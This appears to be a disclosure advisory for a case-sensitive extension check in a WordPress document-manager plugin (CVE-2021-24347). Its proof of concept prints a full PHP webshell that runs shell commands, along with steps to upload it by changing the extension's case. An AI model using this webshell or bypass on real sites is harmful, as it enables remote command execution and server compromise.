SP Project & Document Manager < 4.22 – Authenticated Shell Upload | CVE 2021-24347

Description

The plugin allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP".

The plugin does state that users can upload and manage files without limits, but also does attempt to prevent dangerous files from being uploaded, which was found to be inadequate.

Proof of Concept

1. Upload a webshell as web.php:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

2. Intercept the request
3. Rename the dlg-upload-file[] parameter from web.php with web.pHP
4. Visit http://website.com/wp-content/uploads/sp-client-document-manager/[user's uid]/web.php and use the webshell